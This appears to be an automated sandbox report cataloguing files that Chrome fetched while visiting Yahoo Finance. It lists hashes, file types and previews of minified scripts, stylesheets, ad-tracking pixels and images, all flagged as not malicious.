                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as y,c as L,s as O}from"./commonUtil.BWwawKjd.js";import{m as Q,n as F}from"./utils.CNaWwYSx.js";import{l as H}from"./initializePage.LkEoQoQZ.js";import{l as j}from"./logUtil.CCV3qKPL.js";const N="168x126",m=Q([N]),d={adsFrequency:5,adsImageTags:m.tags,imageTags:m.tags,spaceId:void 0,adsSectionId:void 0},f={homeNewsStream:"homeNewsStreamNeo",newsHubNewsStream:"newsHubNewsStreamNeo"};async function $(t,{isPagination:c=!1,listName:n="home-news-stream",queryRef:o="homeNewsStream",payload:S,adsEnabled:g,enableCrossModuleDedup:l=!1,offset:I=0,...p}={}){var w;const[r,[u,e,A,h]]=await Promise.all([y(t),L(["config","ncpStreams","crumb","ads"],t)]),{enableIncreaseAdsTimeout:P,i13n:T,ads:v={}}=u.getPageConfig()??{},{spaceid:E}=T||{},{adsSectionId:z}=v||{},C=O(r,"enableNeoNCPQuery"),M=!!((w=h.getConfig(r.device))!=null&&w.enableTaboolaAds);o=C&&f[o]?f[o]:o,d.spaceId=E,d.adsSectionId=z;const s=n,_={adsEnabled:g!==void 0?g:!A.isAdLite,adsSlotsEnabled:M,key:"ncp_fin",...d,listName:n,perfLab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=medianet&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=3707184966390587000V10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1829), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.219469198598208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:GpkZNyeML6Q1T4n5/6HN2CgSYa9t29qK4y/HpMKMsHYvR:skehGQi2MSH8P4y/HpMXsHK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5C12E46D3B7A53AFF9D869C8059A7F56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:30D1B58DE9E738EDC8C15DF208E011095A5C56FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D6B2C096322F318ECC055EFC32E27765FC4C7D3CAF0D930D01A99DB939300FE2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BF2A76F9EAC187073D9C0BBAD11AA8256CB82B167C2C382F4FAAA3F564F4ABD5D3290A19E448FD86D88778EC62F629BB98ED5D10AB469DD365BDA45B433A6F92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/nel/css/spotIm.SpotImJACForQSP.atomic.ltr.5c12e46d3b7a53aff9d869c8059a7f56.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bd\(0\),.Bd\(0\){border:0}#atomic .Bdrs\(50\%\){border-radius:50%}#atomic .Bgc\(\#000\){background-color:#000}#atomic .Bgc\(\#124bcb\){background-color:#124bcb}#atomic .Bgc\(\#34af23\){background-color:#34af23}#atomic .Bgc\(\#3c5a77\){background-color:#3c5a77}#atomic .Bgc\(\#7759ff\){background-color:#7759ff}#atomic .Bgc\(t\){background-color:transparent}#atomic .Bxsh\(\$social-bar-box-shadow\){box-shadow:0 7px 10px #000}#atomic .C\(\#7e1fff\){color:#7e1fff}#atomic .C\(\#828c93\){color:#828c93}#atomic .C\(\#9a58b5\){color:#9a58b5}#atomic .D\(f\){display:flex}#atomic .D\(ib\){display:inline-block}#atomic .D\(if\){display:inline-flex}#atomic .Fld\(c\){flex-direction:column}#atomic .Fld\(r\){flex-direction:row}#atomic .Jc\(sb\){justify-content:space-between}#atomic .Fxw\(w\){flex-wrap:wrap}#atomic .Fw\(b\){font-weight:700}#atomic .Fz\(12px\){font-size:12px}#atomic .Fz\(15px\){font-size:15px}#atomic .H\(30px\){height:30px}#atomic .H\(44px\){heig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):489606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.518697260783774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:VAFyxeXMn6+WtjSqsTiykUhAGJaf+7N8vxYKe8BmYSFVW9ZuRJi2+o:qUeXMgyksJhN6aKn7EmZA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C6D0D8650C94EA6ADA46306DB5C9A92C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8BD3FFAF67A0A78A4932E49C23EFD5CFAEFD4159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:35E9CCB1D2B7A55AC143B6BA8704E240AE9217D76F1DB2CB735501AF0B5EB765
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0FA0A3A2DD5C001BB165AED92721BD86065D011B46158262D50CC2A4E6C64135DF749EDF98FACB4013AC29289CA49AEE849F830DFB35A32B68FFE67F89516269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ba,da,ia,va,xa,Aa,Ia,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (552)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.456561817569209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:YQWyL+xpRHUkcQ5V6BJb2JIDkGXc2TjPtKZ+jLuWV6CKEJdnodQ:gKAaVH3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0103E9F52EF96B8BF7939EEBD681D92A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3C7DE469CB144E200BF067650FB3A1A3053640A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EB803B33E2BC6F51CB86B2F318B3850BDED63348CC585E8E4BA0AC59AF18C5F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:80AFAEEB3D14D8D067BF69BBCA978A4F6BAB071CC2D737323CF8981A31214131CD12EFC5DE63B78C39656C2AF7303569F152FE7DFE7F0E13F01B10836D88FD47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pm-widget.taboola.com/yahooweb-network/pmk-20220605.1.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){/*.. Perfect Market Widget Platform Library. Copyright (C) 2011 Perfect Market, Inc.. All Rights Reserved.. NO PERMISSION IS GRANTED TO COPY OR USE CODE EXCEPT AS IS . NECESSARY TO DISPLAY ADS IN THE NORMAL COURSE OF BROWSING A WEB SITE.. CONFIDENTIAL COPYRIGHTED AND PATENTED MATERIAL. US PATENTS 7,610,279 7,644,072 7,617,200 and 7,627,565. OTHER PATENTS PENDING.. DO NOT DECOMPILE OR REVERSE ENGINEER.*/.function m(){return function(){}}function q(b){return function(a){this[b]=a}}function s(b){return function(){return this[b]}}var _pmk=_pmk||{};window._pmk=_pmk;TBWidgetFacebook=function(){this.B="stp";this.name="facebook";this.Ma=!1;this.L=[];this.ia=[];this.Oi=this.pi=!1;this.zh=0;TBWidgetFacebook.prototype.k=m();TBWidgetFacebook.prototype.Ca=m();TBWidgetFacebook.prototype.yh=m();TBWidgetFacebook.prototype.P=function(){this.Ma=!0}};window.TBWidgetFacebook=TBWidgetFacebook;.TBVideoElem=function(b,a,c){this.Wd="none";this.rd=this.Qf="video";this.td="player-div";if(null!==b)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7977), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7977
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.139495302416975
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3YwuuruQt21pxX3W9pOy1zraiGzTX2mD9v6KELqGG85rF04Av:3YDuqQo1pxsOyVra7zTGmBvEzrFhAv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:69D9917872FF1011BCB87D5044F6E12D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DB61157780300B24416F639DF9FB24C5A0829516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F9F7F659C467019A4E8CA49A95810AFD7BAA0A791542C4041E0C0E828A86C18D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1F0B45E4D82F4A1BBC1CBBF6461DC069AC724D7FF1919839732CC94735034A958A40865A53F013700A3D7C3657217A199A8F8DCDAEB07BF586C1531253FCF2DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-geolocation-1.3.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-geolocation",[],t):"object"==typeof exports?exports["wafer-geolocation"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-geolocation"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (8087)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.484284611085702
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:7AqncXssgjzq1IUY7lpTI6jZjaQ5V6HxwoFAw:7FnoD8zc8MuZjaQ5V6Haoew
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2143CFB91C6F811D9D66010C1B5DC640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9903026C25380DBBB291C7B86FCDB3E00F0AA6A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:46565B7BAA3CAEA84A0E0297E3B4C8B89EFA7FA2A45FFAA081212DAAA1356C32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B28CA73DB66F40833B1B2C5B6379C066145102BD3BE21B70DF8F71B5BB7689F11BEB93D89D7693E8A20A9094410C40DC428B4ADA04B2F854C2D695FE20649160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/nodes/159.D0XUuJ58.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{v as ie,p as pe,g as $e,t as M}from"../chunks/commonUtil.BWwawKjd.js";import{i as ge,a as le,S as ue,b as ce,c as _e}from"../chunks/SectorNews.DlxEsgVc.js";import{l as Se}from"../chunks/loadChartAssets.YBm7ZMTT.js";import{l as we}from"../chunks/initializeDock.ayX2qjrc.js";import{a as be}from"../chunks/headerUtil.DzYOGaFq.js";import{l as de}from"../chunks/loadOpenWeb.CNTkLG8G.js";import{l as Re}from"../chunks/loadQSPLeafNews.Q8JDUa09.js";import{l as Ne,S as Ce}from"../chunks/SectorListings.Ck08KCWb.js";import{n as Ee,g as te}from"../chunks/sectorUtil.BRaMmV9S.js";import{r as he}from"../chunks/index.g5YcAAdQ.js";import{s as Pe,e as re,b as S,d as ae,f as ne,j as w,i as b,q as oe,k as N,l as J}from"../chunks/scheduler.Dsuh-FKt.js";import{S as Te,i as ve,c as g,b as l,m as u,t as f,a as i,d as c}from"../chunks/index.CvwOawEI.js";import K from"../chunks/Ads.t43t7gLT.js";import{B as Le}from"../chunks/BreadCrumb.DydJ0B4H.js";import{C as Oe,L as ye,I as Ie,a as ke}from"../chunks/Largest
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkrllHh/:qJ/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C2196DE8BA412C60C22AB491AF7B1409
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5FBD472222FEB8A22CF5B8AA5DC5B8E13AF88E2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6ADC3D4C1056996E4E8B765A62604C78B1F867CCEB3B15D0B9BEDB7C4857F992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:84E24A70B78E9DE9C9D0DFEB49F3F4247DBC1C715D8844471EE40669270682E199D48F5FBEC62BD984C9C0270534B407C4D2561DD6C05ADEC3C83C1534F32D5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://d5p.de17a.com/getuid/pubmatic?https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTI3NDUmdGw9MTI5NjAw&gdpr=0&gdpr_consent=&piggybackCookie=$UID
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (29171), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):29171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.306969057375951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:R+omuH0Pu0Ok68N3sPAM635SGCXN7hnswCR8Tygn0xyfY2YgHK:jH0G0Ok68N3sPAM635SGCXN1swCR8tXu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6441E6CD44203711A611CD3DB3C116B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FA424D29D3B5BCBAA9CEC2F9132B90F843878396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:870DBD26A7FA2346B58C17892B3E754C545CFEDA22F4601F87BDEF81835E6252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7142E6020D47D805665BB9348DEA2051FB3DA0ED6A7230D8EBDE81A459A8045153F58C515920FD553F5853FF2F4D83C4152B9CD553B8FF097B0E51BF714D433D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-caas",[],t):"object"==typeof exports?exports["wafer-caas"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-caas"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(a[r])return a[r].exports;var i=a[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var a={};return t.m=e,t.c=a,t.d=function(e,a,r){t.o(e,a)||Object.defineProperty(e,a,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(a,"a",a),a},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,a){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (19845)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19939
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.73252636335448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:YnIneIVlVqlVHwTVJvHIHmo/zYyPQEHvVPnWtP5gTSLkT1G8pBI+:YnIneIHVCVMFq/zvfHNPWtPCTskT9pBR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:211E980C0F2354CDAC9669B14EF4D46A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D4DD086AF2C7094E73A4973E354ACD634668FFCE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:60D8A481E2A8250276904D8D120929313843F8A69646B981B4114BE928023438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:66B504AC35EF0659BDC0B982610F0508379D2CA10E56530729EBF9DE3D201FA246C13AB7D6930F352B520BCA9265537C3EDCC4739B69C75EC325B0F3FA2A971E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-7db6e8e4.1529d1be95c4d4d658f3.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6516],{8602:(e,r,a)=>{a.d(r,{A:()=>f}),function(){const e=Object.defineProperties({domains:["^127\\.0\\.0\\.1$","^(?:.+\\.)?localhost$","^(?:.+\\.)?yahoo\\.com$","^(?:.+\\.)?localhost$","^127\\.0\\.0\\.1$"],filesystem:!0,licenseExpiration:"2025/06/27",trialExpiration:void 0,version:"9.0.0"},{daysUntilExpired:{get:function(){return Math.round((this.expirationDate-new Date)/864e5)}},expirationDate:{get:function(){return new Date(this.licenseExpiration||this.trialExpiration)}},gracePeriodDate:{get:function(){const e=new Date(this.expirationDate);return this.isTrial||e.setDate(e.getDate()+30),e}},isDateLocked:{get:function(){return this.licenseExpiration||this.trialExpiration}},isDomainLocked:{get:function(){return this.domains&&this.domains.length>0}},isFileSystemLocked:{get:function(){return voi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (55201), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):55201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.402742992612217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:Xr4MuUUXPgSKUUJcConr/m8b6442RZTeKc8o:7cX6Uvw2RZTeDT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1373A6D9D7D4C547326572BF62610656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4D55756AB17C6DB24AC089687DF5F4F5668F8721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5A342906865F8FEEE1DFDD0132EE45310D87E4138661797F20CAAE3C049370E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:47D602F1F860A672ACB0D76EC1D102D75FE5AA89C5599CC6BD69CF3BD4F2C804ED5CC75CF59C538BFCC84D40DD937C51161CF771B75A67949849D278BA4D4FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://jac.yahoosandbox.com/2.0.0/jac.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! JAC 2.0.0, Copyright 2018-2023 Yahoo Inc. */(()=>{"use strict";const e=class{constructor(e,t={}){this.type=e,this.meta=t,this.target=null}};class t extends e{static SCROLL="page.scroll";static RESIZE="page.resize";static VISIBILITY="page.visibility";static FOCUS="window.focus";static BLUR="window.blur";static FOCUS_IN="window.focus_in";static BLUR_CAPTURE="window.blur_capture";static DOM_LOADED="dom.loaded";static LOADED="page.loaded";static BEFORE_UNLOAD="page.stopped";static MOUSE_OVER="page.mouse_over";static MOUSE_OUT="page.mouse_out"}const i={addDOMLoadListener:function(e){if("loading"!==document.readyState)return e();document.addEventListener("DOMContentLoaded",e,!1)},addPageLoadListener:function(e){if("complete"===document.readyState)return e();window.addEventListener("load",e,!1)}};function s(e,t,i=this){let s=null,n=null;const o=()=>{e.apply(i,n),s=null};return(...e)=>{s||(n=e,s=setTimeout(o,t))}}function n(e,t){if(Array.isArray(t)){if(t.includes(e))return!0}else for(let i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):88248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.968491746398082
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:HeQVGVD7S2kD0bfgzpCKdVna2A+L60YffJjFYkwPTyR3w/oT79GRgLs4fV6knP5S:NwPkD0bqh1a2AUmffvYkgT0w6zb7/e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:89B8B3A64A1661977A26C16DF9368523
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:538A42F67460AE27B0DD8CA5C14EA59174FD31B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:65FF7B0D4482673B824A86E4D12C31C736D7411209D6499090A2F5CBE0484908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5109F152DCDB84D13B0AE906C4E145A446E70F705691400BD91840ED5225C18399FD6D3ADC82FAE547F0083A168E79465DA384E3ABD9487B66D473B42D8F88F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C......................................................................................................................L.........................!.1.."AQ.a.2q..#B.R...$3b...r....%4.Cc...&..d.....................................>........................!...1A"Q#2a.3Bq...Rb.$C...4S..%..Dr.............?..*.R.W1..H.@f."RF=*F1.....\7..../q.K<.+)._:...T"D....... .@.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2162
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.655663585165413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:qkCDhll5xuPgTXCeybFuryI7hAu3obFuA8igBQWbz:glCUybFuuI9j3obFuBi/Wbz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AA489CAF1E3F2BF852E2C60E6408B067
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9960B9D960FD5CA70683AA20C78A4F962C549168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:37A31642AF0A7FE695ED0FD68A06A55AF44E854D083DC7F5D0E70535F0189AE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EBFFC578839A404557FAC7B51511D3D5FB1BA7711DABA34480FB89875740FFBB90FBCC98986F2F1F5399B42E9707F851301D740477D877FE471F69A061F49C25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
